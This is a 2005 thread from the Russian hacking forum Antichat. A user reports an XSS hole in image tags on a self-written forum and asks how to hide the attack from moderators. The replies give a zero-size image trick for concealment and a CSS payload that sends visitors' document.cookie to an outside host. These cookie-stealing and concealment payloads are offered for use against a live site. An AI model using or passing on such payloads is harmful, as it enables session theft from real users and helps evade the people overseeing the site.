ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу XSS в теге <img>
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

XSS в теге <img>
  #1  
Старый 04.11.2005, 03:05
Аватар для Xex
Xex
Banned
Регистрация: 10.07.2005
Сообщений: 224
Провел на форуме:
1062041

Репутация: 50
По умолчанию XSS в теге <img>
Ребят нашел XSS в теге img, примерно так:
<img src="javascript:alert()">
но вот незадача, при отображении на форуме остается значек незагруженной картинки, мне кажется что это особо пытливых модеров заитересует...как мне "<img src="javascript:alert()">"
после выполнения скрипта присвоить реальную картинку?...document.image[0].src не катит ибо не знаю номер моей картинки в массиве image[]...
 

  #2  
Старый 04.11.2005, 11:41
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию
скажи форум, может можно придумать что-то
 

  #3  
Старый 04.11.2005, 12:14
Аватар для My-Ice
My-Ice
Новичок
Регистрация: 29.10.2005
Сообщений: 12
Провел на форуме:
83932

Репутация: 0
По умолчанию
А там можно сделать перенаправление на картинку с другого сайта?
 

  #4  
Старый 04.11.2005, 12:45
Аватар для Xex
Xex
Banned
Регистрация: 10.07.2005
Сообщений: 224
Провел на форуме:
1062041

Репутация: 50
По умолчанию
Цитата:
Сообщение от max_pain89  
скажи форум, может можно придумать что-то
Форум самописаный...
Цитата:
Сообщение от My-Ice  
А там можно сделать перенаправление на картинку с другого сайта?
Можно....
 

  #5  
Старый 04.11.2005, 14:32
Аватар для PSalm69
PSalm69
[ радиоверсия ]
Регистрация: 12.07.2005
Сообщений: 946
Провел на форуме:
7544767

Репутация: 1060


По умолчанию
Цитата:
Сообщение от Xex  
Ребят нашел XSS в теге img, примерно так:
<img src="javascript:alert()">
но вот незадача, при отображении на форуме остается значек незагруженной картинки, мне кажется что это особо пытливых модеров заитересует...как мне "<img src="javascript:alert()">"
после выполнения скрипта присвоить реальную картинку?...document.image[0].src не катит ибо не знаю номер моей картинки в массиве image[]...
<img src="javascript :alert()" width=0 height=0> Из этого и делай свой код.
Ешё можно использовать скрипт в STYLE примерно таким образом

Код:
style=display:none;background:url(javascript:ANTICHAT.src='http://antichat.ru/cg-bin/s.gif?'+document.cookie);name=ANTICHAT
почти всё что связано с реализацией XSS можно найти тут http://www.antichat.ru/crackchat/HTML/
__________________
ICQ 9731923
 
Закрытая тема



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ